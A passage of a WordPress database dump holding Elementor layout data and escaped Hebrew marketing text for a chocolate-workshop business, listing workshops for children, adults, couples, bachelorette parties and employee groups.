\\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd. <br \\/><br \\/>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2240,426,'_elementor_edit_mode','builder'),(2241,426,'_elementor_template_type','wp-page'),(2242,426,'_elementor_version','2.7.5'),(2243,426,'_elementor_pro_version','2.7.3'),(2244,426,'_wp_page_template','elementor_header_footer'),(2245,426,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2246,426,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea 